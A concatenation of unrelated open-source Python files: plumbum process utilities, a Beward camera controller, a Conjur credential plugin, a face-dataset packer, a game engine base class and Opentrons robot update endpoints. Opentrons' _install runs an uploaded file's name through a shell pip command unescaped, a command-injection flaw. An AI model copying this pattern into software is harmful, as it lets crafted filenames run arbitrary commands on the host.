yield queue.get_nowait()
last_line_ts = time.time()
empty = False
except QueueEmpty:
empty = True
if time.time() - last_line_ts > line_timeout:
raise ProcessLineTimedOut(
"popen line timeout expired",
getattr(proc, "argv", None),
getattr(proc, "machine", None),
)
if proc.poll() is not None:
break
if empty:
time.sleep(0.1)
for piper in pipers:
piper.join()
while True:
try:
yield queue.get_nowait()
except QueueEmpty:
break
if IS_WIN32:
_iter_lines = _iter_lines_win32
else:
_iter_lines = _iter_lines_posix
# ===================================================================================================
# Exceptions
# ===================================================================================================
class ProcessExecutionError(EnvironmentError):
"""Represents the failure of a process. When the exit code of a terminated process does not
match the expected result, this exception is raised by :func:`run_proc
<plumbum.commands.run_proc>`. It contains the process' return code, stdout, and stderr, as
well as the command line used to create the process (``argv``)
"""
def __init__(self, argv, retcode, stdout, stderr, message=None):
Exception.__init__(self, argv, retcode, stdout, stderr)
self.message = message
self.argv = argv
self.retcode = retcode
if six.PY3 and isinstance(stdout, six.bytes):
stdout = six.ascii(stdout)
if six.PY3 and isinstance(stderr, six.bytes):
stderr = six.ascii(stderr)
self.stdout = stdout
self.stderr = stderr
def __str__(self):
# avoid an import cycle
from plumbum.commands.base import shquote_list
stdout = "\n | ".join(str(self.stdout).splitlines())
stderr = "\n | ".join(str(self.stderr).splitlines())
cmd = " ".join(shquote_list(self.argv))
lines = []
if self.message:
lines = [self.message, "\nReturn code: | ", str(self.retcode)]
else:
lines = ["Unexpected exit code: ", str(self.retcode)]
cmd = "\n | ".join(cmd.splitlines())
lines += ["\nCommand line: | ", cmd]
if stdout:
lines += ["\nStdout: | ", stdout]
if stderr:
lines += ["\nStderr: | ", stderr]
return "".join(lines)
class ProcessTimedOut(Exception):
"""Raises by :func:`run_proc <plumbum.commands.run_proc>` when a ``timeout`` has been
specified and it has elapsed before the process terminated"""
def __init__(self, msg, argv):
Exception.__init__(self, msg, argv)
self.argv = argv
class ProcessLineTimedOut(Exception):
"""Raises by :func:`iter_lines <plumbum.commands.iter_lines>` when a ``line_timeout`` has been
specified and it has elapsed before the process yielded another line"""
def __init__(self, msg, argv, machine):
Exception.__init__(self, msg, argv, machine)
self.argv = argv
self.machine = machine
class CommandNotFound(AttributeError):
"""Raised by :func:`local.which <plumbum.machines.local.LocalMachine.which>` and
:func:`RemoteMachine.which <plumbum.machines.remote.RemoteMachine.which>` when a
command was not found in the system's ``PATH``"""
def __init__(self, program, path):
Exception.__init__(self, program, path)
self.program = program
self.path = path
# ===================================================================================================
# Timeout thread
# ===================================================================================================
class MinHeap(object):
def __init__(self, items=()):
self._items = list(items)
heapq.heapify(self._items)
def __len__(self):
return len(self._items)
def push(self, item):
heapq.heappush(self._items, item)
def pop(self):
heapq.heappop(self._items)
def peek(self):
return self._items[0]
_timeout_queue = Queue()
_shutting_down = False
def _timeout_thread_func():
waiting = MinHeap()
try:
while not _shutting_down:
if waiting:
ttk, _ = waiting.peek()
timeout = max(0, ttk - time.time())
else:
timeout = None
try:
proc, time_to_kill = _timeout_queue.get(timeout=timeout)
if proc is SystemExit:
# terminate
return
waiting.push((time_to_kill, proc))
except QueueEmpty:
pass
now = time.time()
while waiting:
ttk, proc = waiting.peek()
if ttk > now:
break
waiting.pop()
try:
if proc.poll() is None:
proc.kill()
proc._timed_out = True
except EnvironmentError:
pass
except Exception:
if _shutting_down:
# to prevent all sorts of exceptions during interpreter shutdown
pass
else:
raise
bgthd = Thread(target=_timeout_thread_func, name="PlumbumTimeoutThread")
bgthd.daemon = True
bgthd.start()
def _register_proc_timeout(proc, timeout):
if timeout is not None:
_timeout_queue.put((proc, time.time() + timeout))
def _shutdown_bg_threads():
global _shutting_down
_shutting_down = True
# Make sure this still exists (don't throw error in atexit!)
if _timeout_queue:
_timeout_queue.put((SystemExit, 0))
# grace period
bgthd.join(0.1)
atexit.register(_shutdown_bg_threads)
# ===================================================================================================
# run_proc
# ===================================================================================================
def run_proc(proc, retcode, timeout=None):
"""Waits for the given process to terminate, with the expected exit code
:param proc: a running Popen-like object, with all the expected methods.
:param retcode: the expected return (exit) code of the process. It defaults to 0 (the
convention for success). If ``None``, the return code is ignored.
It may also be a tuple (or any object that supports ``__contains__``)
of expected return codes.
:param timeout: the number of seconds (a ``float``) to allow the process to run, before
                    forcefully terminating it. If ``None``, no timeout is imposed; otherwise
the process is expected to terminate within that timeout value, or it will
be killed and :class:`ProcessTimedOut <plumbum.cli.ProcessTimedOut>`
will be raised
:returns: A tuple of (return code, stdout, stderr)
"""
_register_proc_timeout(proc, timeout)
stdout, stderr = proc.communicate()
proc._end_time = time.time()
if not stdout:
stdout = six.b("")
if not stderr:
stderr = six.b("")
if getattr(proc, "custom_encoding", None):
if hasattr(stdout, "decode"):
stdout = stdout.decode(proc.custom_encoding, "ignore")
if hasattr(stderr, "decode"):
stderr = stderr.decode(proc.custom_encoding, "ignore")
return _check_process(proc, retcode, timeout, stdout, stderr)
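# Rough usage sketch for run_proc (the command and timeout below are only illustrative):
#
#   from plumbum import local
#   proc = local["ls"]["-la"].popen()
#   rc, out, err = run_proc(proc, retcode=0, timeout=10)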
# ===================================================================================================
# iter_lines
# ===================================================================================================
BY_POSITION = object()
BY_TYPE = object()
DEFAULT_ITER_LINES_MODE = BY_POSITION
def iter_lines(
proc,
retcode=0,
timeout=None,
linesize=-1,
line_timeout=None,
mode=None,
_iter_lines=_iter_lines,
):
"""Runs the given process (equivalent to run_proc()) and yields a tuples of (out, err) line pairs.
If the exit code of the process does not match the expected one, :class:`ProcessExecutionError
<plumbum.commands.ProcessExecutionError>` is raised.
:param retcode: The expected return code of this process (defaults to 0).
In order to disable exit-code validation, pass ``None``. It may also
be a tuple (or any iterable) of expected exit codes.
:param timeout: The maximal amount of time (in seconds) to allow the process to run.
``None`` means no timeout is imposed; otherwise, if the process hasn't
terminated after that many seconds, the process will be forcefully
                    terminated and an exception will be raised
:param linesize: Maximum number of characters to read from stdout/stderr at each iteration.
``-1`` (default) reads until a b'\\n' is encountered.
:param line_timeout: The maximal amount of time (in seconds) to allow between consecutive lines in either stream.
Raise an :class:`ProcessLineTimedOut <plumbum.commands.ProcessLineTimedOut>` if the timeout has
been reached. ``None`` means no timeout is imposed.
:returns: An iterator of (out, err) line tuples.
"""
if mode is None:
mode = DEFAULT_ITER_LINES_MODE
assert mode in (BY_POSITION, BY_TYPE)
encoding = getattr(proc, "custom_encoding", None) or "utf-8"
decode = lambda s: s.decode(encoding, errors="replace").rstrip()
_register_proc_timeout(proc, timeout)
buffers = [StringIO(), StringIO()]
for t, line in _iter_lines(proc, decode, linesize, line_timeout):
# verify that the proc hasn't timed out yet
proc.verify(timeout=timeout, retcode=None, stdout=None, stderr=None)
buffers[t].write(line + "\n")
if mode is BY_POSITION:
ret = [None, None]
ret[t] = line
yield tuple(ret)
elif mode is BY_TYPE:
yield (t + 1), line # 1=stdout, 2=stderr
# this will take care of checking return code and timeouts
_check_process(proc, retcode, timeout, *(s.getvalue() for s in buffers))
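# Rough usage sketch for iter_lines (the command below is only illustrative): stream a
# long-running command's output line by line, telling stdout from stderr by tuple position.
#
#   from plumbum import local
#   proc = local["ping"]["-c", "3", "localhost"].popen()
#   for out, err in iter_lines(proc, retcode=None):
#       if out is not None:
#           print("OUT:", out)
#       if err is not None:
#           print("ERR:", err)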
|
core.py
|
# Copyright (c) 2019-2021, Andrey "Limych" Khrolenok <andrey@khrolenok.ru>
# Creative Commons BY-NC-SA 4.0 International Public License
# (see LICENSE.md or https://creativecommons.org/licenses/by-nc-sa/4.0/)
"""Beward devices controller core."""
import logging
import socket
import threading
from datetime import datetime
from time import sleep
from typing import Optional
import requests
from requests import ConnectTimeout, PreparedRequest, RequestException, Response
from requests.auth import HTTPBasicAuth
from beward.util import is_valid_fqdn, normalize_fqdn
from .const import ALARM_ONLINE, BEWARD_MODELS, MSG_GENERIC_FAIL, TIMEOUT
_LOGGER = logging.getLogger(__name__)
# pylint: disable=too-many-instance-attributes
class BewardGeneric:
"""Generic Implementation for Beward device."""
_class_group = "Beward"
@staticmethod
# pylint: disable=unsubscriptable-object
def get_device_type(model: Optional[str]) -> Optional[str]:
"""Detect device type for model."""
if not model:
return None
for dev_type, models in BEWARD_MODELS.items():
if model in models.split():
return dev_type
return None
# pylint: disable=unused-argument
def __init__(self, host: str, username: str, password: str, port=None, **kwargs):
"""Initialize generic Beward device controller."""
self._sysinfo = None
self._listen_alarms = False
self._listener = None
if port is None:
try:
port = host.split(":")[1]
except IndexError:
pass
host = normalize_fqdn(host)
try:
if not is_valid_fqdn(host):
socket.inet_aton(host)
except OSError as exc:
raise ValueError("Not a valid host address") from exc
self.host = host
self.port = int(port) if port else 80
self.username = username
self.password = password
self.session = requests.session()
self.params = {}
self.last_activity = None
self.alarm_state = {
ALARM_ONLINE: False,
}
self.alarm_timestamp = {
ALARM_ONLINE: datetime.min,
}
self._alarm_handlers = set()
self._alarm_listeners = []
def __del__(self):
"""Destructor."""
self._listen_alarms = False
if self._listener:
self._listener.join()
def get_url(
self, function: str, extra_params=None, username=None, password=None
) -> str:
"""Get entry point for function."""
url = "http://"
if username:
url += username
if password:
url += ":" + password
url += "@"
url += "%s:%d/cgi-bin/%s_cgi" % (self.host, self.port, function)
if extra_params:
url = self.add_url_params(url, extra_params)
return url
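    # e.g. get_url("systeminfo", extra_params={"action": "get"}) yields something like
    # "http://<host>:<port>/cgi-bin/systeminfo_cgi?action=get" (host/port are whatever this
    # controller was constructed with; any values in self.params are appended as well).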
def add_url_params(self, url: str, extra_params: dict) -> str:
"""Add params to URL."""
params = self.params.copy()
params.update(extra_params)
req = PreparedRequest()
req.prepare_url(url, params)
return req.url
# pylint: disable=unsubscriptable-object
def query(self, function: str, extra_params=None) -> Optional[Response]:
"""Query data from Beward device."""
url = self.get_url(function)
_LOGGER.debug("Querying %s", url)
response = None
# allow to override params when necessary
# and update self.params globally for the next connection
params = self.params.copy()
if extra_params:
params.update(extra_params)
# Add authentication data
auth = HTTPBasicAuth(self.username, self.password)
try:
req = self.session.get(url, params=params, auth=auth, timeout=TIMEOUT)
_LOGGER.debug("_query ret %s", req.status_code)
except Exception as err_msg:
_LOGGER.error("Error! %s", err_msg)
raise
if req.status_code == 200 or req.status_code == 204:
response = req
if response is None: # pragma: no cover
_LOGGER.debug("%s", MSG_GENERIC_FAIL)
return response
def add_alarms_handler(self, handler: callable):
"""Add alarms handler."""
self._alarm_handlers.add(handler)
return self
def remove_alarms_handler(self, handler: callable):
"""Remove alarms handler."""
if handler in self._alarm_handlers:
self._alarm_handlers.remove(handler)
self._listen_alarms = len(self._alarm_handlers) != 0
return self
def _handle_alarm(self, timestamp: datetime, alarm: str, state: bool):
"""Handle alarms from Beward device."""
_LOGGER.debug("Handle alarm: %s; State: %s", alarm, state)
self.last_activity = timestamp
self.alarm_timestamp[alarm] = timestamp
self.alarm_state[alarm] = state
for handler in self._alarm_handlers:
handler(self, timestamp, alarm, state)
def listen_alarms(self, channel: int = 0, alarms=None):
"""Listen for alarms from Beward device."""
if alarms is None: # pragma: no cover
alarms = {}
url = self.get_url("alarmchangestate")
_LOGGER.debug("Querying %s", url)
params = self.params.copy()
params.update({"channel": channel, "parameter": ";".join(set(alarms))})
auth = HTTPBasicAuth(self.username, self.password)
self._listen_alarms = len(self._alarm_handlers) != 0
self._listener = threading.Thread(
target=self.__alarms_listener, args=(url, params, auth), daemon=True
)
self._listener.start()
self._alarm_listeners.append(self._listener)
_LOGGER.debug("Return from listen_alarms()")
def __alarms_listener(self, url: str, params, auth):
while self._listen_alarms:
try:
resp = requests.get(url, params=params, auth=auth, stream=True)
except RequestException: # pragma: no cover
break
_LOGGER.debug("_query ret %s", resp.status_code)
if not self._listen_alarms: # pragma: no cover
break
if resp.status_code != 200: # pragma: no cover
sleep(TIMEOUT)
continue
self._handle_alarm(datetime.now(), ALARM_ONLINE, True)
for line in resp.iter_lines(chunk_size=1, decode_unicode=True):
if not self._listen_alarms: # pragma: no cover
break
if line:
_LOGGER.debug("Alarm: %s", line)
date, time, alert, state, _ = str(line).split(";", 5)
timestamp = datetime.strptime(
date + " " + time, "%Y-%m-%d %H:%M:%S"
)
state = state != "0"
self._handle_alarm(timestamp, alert, state)
self._handle_alarm(datetime.now(), ALARM_ONLINE, False)
self._handle_alarm(datetime.now(), ALARM_ONLINE, False) # pragma: no cover
def get_info(self, function: str) -> dict:
"""Get info from Beward device."""
info = {}
data = self.query(function, extra_params={"action": "get"}).text
for env in data.splitlines():
            (key, val) = env.split("=", 1)  # split on the first "=" only, so values containing "=" stay intact
info[key] = val
return info
@property
def system_info(self) -> dict:
"""Get system info from Beward device."""
if self._sysinfo:
return self._sysinfo
self._sysinfo = {}
try:
self._sysinfo = self.get_info("systeminfo")
except ConnectTimeout:
pass
return self._sysinfo
@property
# pylint: disable=unsubscriptable-object
def device_type(self) -> Optional[str]:
"""Detect device type."""
return self.get_device_type(self.system_info.get("DeviceModel"))
def is_online(self) -> bool:
"""Return True if entity is online."""
try:
self.query("systeminfo")
except ConnectTimeout:
return False
return True
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.is_online()
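# Hedged usage sketch (the host, credentials and alarm name below are placeholders,
# not part of the library):
#
#     device = BewardGeneric("192.168.1.10", "admin", "password")
#     def on_alarm(dev, timestamp, alarm, state):
#         print(timestamp, alarm, state)
#     device.add_alarms_handler(on_alarm)
#     device.listen_alarms(channel=0, alarms={"MotionDetection"})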
|
conjur.py
|
from .plugin import CredentialPlugin
import base64
import os
import stat
import tempfile
import threading
from urllib.parse import urljoin, quote_plus
from django.utils.translation import ugettext_lazy as _
import requests
conjur_inputs = {
'fields': [{
'id': 'url',
'label': _('Conjur URL'),
'type': 'string',
'format': 'url',
}, {
'id': 'api_key',
'label': _('API Key'),
'type': 'string',
'secret': True,
}, {
'id': 'account',
'label': _('Account'),
'type': 'string',
}, {
'id': 'username',
'label': _('Username'),
'type': 'string',
}, {
'id': 'cacert',
'label': _('Public Key Certificate'),
'type': 'string',
'multiline': True
}],
'metadata': [{
'id': 'secret_path',
'label': _('Secret Identifier'),
'type': 'string',
'help_text': _('The identifier for the secret e.g., /some/identifier'),
}, {
'id': 'secret_version',
'label': _('Secret Version'),
'type': 'string',
'help_text': _('Used to specify a specific secret version (if left empty, the latest version will be used).'),
}],
'required': ['url', 'api_key', 'account', 'username'],
}
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
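# Illustrative note (derived from the function above, no new behaviour): the CA
# certificate passed as the `verify=` argument below travels through this FIFO, so the
# writer thread blocks until requests reads it and the data is never stored in a
# regular file.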
def conjur_backend(**kwargs):
url = kwargs['url']
api_key = kwargs['api_key']
account = quote_plus(kwargs['account'])
username = quote_plus(kwargs['username'])
secret_path = quote_plus(kwargs['secret_path'])
version = kwargs.get('secret_version')
cacert = kwargs.get('cacert', None)
auth_kwargs = {
'headers': {'Content-Type': 'text/plain'},
'data': api_key
}
if cacert:
auth_kwargs['verify'] = create_temporary_fifo(cacert.encode())
# https://www.conjur.org/api.html#authentication-authenticate-post
resp = requests.post(
urljoin(url, '/'.join(['authn', account, username, 'authenticate'])),
**auth_kwargs
)
resp.raise_for_status()
token = base64.b64encode(resp.content).decode('utf-8')
lookup_kwargs = {
'headers': {'Authorization': 'Token token="{}"'.format(token)},
}
if cacert:
lookup_kwargs['verify'] = create_temporary_fifo(cacert.encode())
# https://www.conjur.org/api.html#secrets-retrieve-a-secret-get
path = urljoin(url, '/'.join([
'secrets',
account,
'variable',
secret_path
]))
if version:
path = '?'.join([path, version])
resp = requests.get(path, timeout=30, **lookup_kwargs)
resp.raise_for_status()
return resp.text
conjur_plugin = CredentialPlugin(
'CyberArk Conjur Secret Lookup',
inputs=conjur_inputs,
backend=conjur_backend
)
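# Hedged usage sketch (every value below is a placeholder, not part of the plugin):
#
#     secret = conjur_backend(
#         url="https://conjur.example.com",
#         api_key="...",
#         account="myorg",
#         username="host/my-app",
#         secret_path="prod/db/password",
#     )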
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
import pdb
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
idToPathFile = open("id_to_path.txt", "w")
with open(path_in) as fin:
identities = []
last = [-9999999, -1]
_id = 1
baseDir = os.path.dirname(path_in)
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not os.path.exists(item.image_path):
pathItemList = item.image_path.split('/')
item.image_path = os.path.join(baseDir, pathItemList[-3], pathItemList[-2], pathItemList[-1])
if not os.path.exists(item.image_path):
print('path error! ignore line: ', line)
continue
if not item.aligned and item.landmark is None:
print('ignore line: ', line)
continue
item.id = _id #item index
item.label = [label, item.aligned]
# record id<==>path
idToPathFile.write("%d, %s\n" % (item.id, item.image_path))
yield item
            if label!=last[0]:  # save the (label, id) relation info at the ending of each class
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))] #last _id , last _id + len(ids)
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
            yield item  # the ending item of each class
idToPathFile.close()
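# Illustrative note (derived from the generator above, no new behaviour): read_list()
# first yields one flag=0 item per usable image, then a single flag=2 "header" item
# whose label is the id range occupied by the identity items that follow, and finally
# one flag=2 item per identity whose label is that class's range of image ids.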
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write1', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
print('write2', item.flag, item.id, item.label) #anchor + class info saved in IRHeader
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
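# Illustrative note (derived from the code above, no new behaviour): write_worker()
# buffers out-of-order results in `buf`, keyed by their input index, and only writes
# record number `count` once it has arrived, so the .rec/.idx output preserves the
# original list order even with multiple reader processes.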
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
                        help='If true recursively walk through subdirs and assign a unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
                        help='number of threads to use for encoding. Order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
if item.id == 0:
print("*****************************")
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
            print('Did not find any .lst file with prefix %s' % args.prefix)
|
IEngine.py
|
import typing
from abc import ABC, abstractmethod
from threading import Thread
from typing import Callable
if typing.TYPE_CHECKING:
from fishy.gui import GUI
class IEngine(ABC):
def __init__(self, config, gui_ref: 'Callable[[], GUI]'):
self.get_gui = gui_ref
self.start = False
self.window = None
self.thread = None
self.config = config
@property
def gui(self):
return self.get_gui().funcs
def toggle_start(self):
self.start = not self.start
if self.start:
self.thread = Thread(target=self.run)
self.thread.start()
@abstractmethod
def run(self):
...
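# Hedged sketch of a concrete engine (the subclass below is illustrative, not part of
# fishy):
#
#     class ExampleEngine(IEngine):
#         def run(self):
#             while self.start:
#                 ...  # one unit of work per iteration; toggle_start() flips self.start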
|
serverlib_fallback.py
|
# This file duplicates the implementation of ot2serverlib. Remove once all
# robots have new update endpoints
import os
import json
import asyncio
import logging
from time import sleep
from aiohttp import web
from threading import Thread
log = logging.getLogger(__name__)
PATH = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(PATH, 'ignore.json')
async def _install(filename, loop):
proc = await asyncio.create_subprocess_shell(
'pip install --upgrade --force-reinstall --no-deps {}'.format(
filename),
stdout=asyncio.subprocess.PIPE,
loop=loop)
rd = await proc.stdout.read()
res = rd.decode().strip()
print(res)
await proc.wait()
return res
async def install_py(data, loop):
filename = data.filename
log.info('Preparing to install: {}'.format(filename))
content = data.file.read()
with open(filename, 'wb') as wf:
wf.write(content)
msg = await _install(filename, loop)
log.debug('Install complete')
try:
os.remove(filename)
except OSError:
pass
log.debug("Result: {}".format(msg))
return {'message': msg, 'filename': filename}
async def install_smoothie_firmware(data, loop):
from opentrons.server.endpoints.update import _update_firmware
filename = data.filename
log.info('Flashing image "{}", this will take about 1 minute'.format(
filename))
content = data.file.read()
with open(filename, 'wb') as wf:
wf.write(content)
msg = await _update_firmware(filename, loop)
log.debug('Firmware Update complete')
try:
os.remove(filename)
except OSError:
pass
log.debug("Result: {}".format(msg))
return {'message': msg, 'filename': filename}
def _set_ignored_version(version):
"""
Private helper function that writes the most updated
API version that was ignored by a user in the app
:param version: Most recent ignored API update
"""
data = {'version': version}
with open(filepath, 'w') as data_file:
json.dump(data, data_file)
def _get_ignored_version():
"""
:return: Most recently ignored API version
"""
if os.path.exists(filepath):
with open(filepath) as data_file:
data = json.load(data_file)
version = data.get('version')
else:
version = None
return version
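# Hedged example (the version string is a placeholder): after _set_ignored_version("3.4.0"),
# ignore.json contains {"version": "3.4.0"} and _get_ignored_version() returns "3.4.0".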
async def get_ignore_version(request):
"""
This handler returns a GET request of form application/json.
The return body will be formatted as:
{"version": version_ignored}
If no version has been previously ignored, the value will be null
"""
ignored_version = _get_ignored_version()
res = {'version': ignored_version}
return web.json_response(res)
async def set_ignore_version(request):
"""
This handler expects a POST request of form application/json.
The request body should be formatted as:
{"version": version_ignored}
The POST will 400 in the following scenarios:
1. Sending an empty dict
2. Sending a dict with an empty string
"""
data = await request.json()
if 'version' in data.keys():
ignored_version = data.get('version')
log.debug('Set Ignore Version to {}'.format(ignored_version))
if ignored_version == '':
status = 400
res = {'version': None}
else:
_set_ignored_version(ignored_version)
status = 200
res = {'version': ignored_version}
else:
status = 400
res = {'version': None}
return web.json_response(res, status=status)
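# Hedged example of exercising the handler above (the route itself is registered
# elsewhere; the version string is a placeholder): a POST body of {"version": "3.4.0"}
# returns 200 and echoes the version back, while an empty dict or an empty version
# string returns 400 with {"version": null}.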
async def update_api(request: web.Request) -> web.Response:
"""
This handler accepts a POST request with Content-Type: multipart/form-data
and file fields in the body named "whl", "serverlib", and "fw". The "whl"
and "serverlib" files should be valid Python wheels to be installed ("whl"
is expected generally to be the API server wheel, and "serverlib" is
    expected to be the ot2serverlib wheel). The "fw" file is expected to be a
    Smoothie firmware hex file. The Python files are installed using pip, and the
firmware file is flashed to the Smoothie board, then the files are deleted
and a success code is returned.
"""
log.debug('Update request received')
data = await request.post()
try:
res0 = await install_py(
data['whl'], request.loop)
reslist = [res0]
if 'serverlib' in data.keys():
res1 = await install_py(
data['serverlib'], request.loop)
reslist.append(res1)
if 'fw' in data.keys():
res2 = await install_smoothie_firmware(
data['fw'], request.loop)
reslist.append(res2)
res = {
'message': [r['message'] for r in reslist],
'filename': [r['filename'] for r in reslist]
}
status = 200
except Exception as e:
res = {'message': 'Exception {} raised by update of {}: {}'.format(
type(e), data, e.__traceback__)}
status = 500
return web.json_response(res, status=status)
async def update_firmware(request):
"""
This handler accepts a POST request with Content-Type: multipart/form-data
and a file field in the body named "hex". The file should be a valid HEX
image to be flashed to the LPC1769. The received file is flashed using
lpc21isp, and then deleted and a success code is returned.
"""
log.debug('Update Firmware request received')
data = await request.post()
try:
res = await install_smoothie_firmware(data['hex'], request.loop)
status = 200
except Exception as e:
log.exception("Exception during firmware update:")
res = {'message': 'Exception {} raised by update of {}: {}'.format(
type(e), data, e.__traceback__)}
status = 500
return web.json_response(res, status=status)
async def restart(request):
"""
Returns OK, then waits approximately 1 second and restarts container
"""
def wait_and_restart():
log.info('Restarting server')
sleep(1)
os.system('kill 1')
Thread(target=wait_and_restart).start()
return web.json_response({"message": "restarting"})
|
Ghost.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
MIT License
Copyright (c) 2022 Ben Tettmar
Permission is hereby granted, free of charge, to any person obtaining a copy
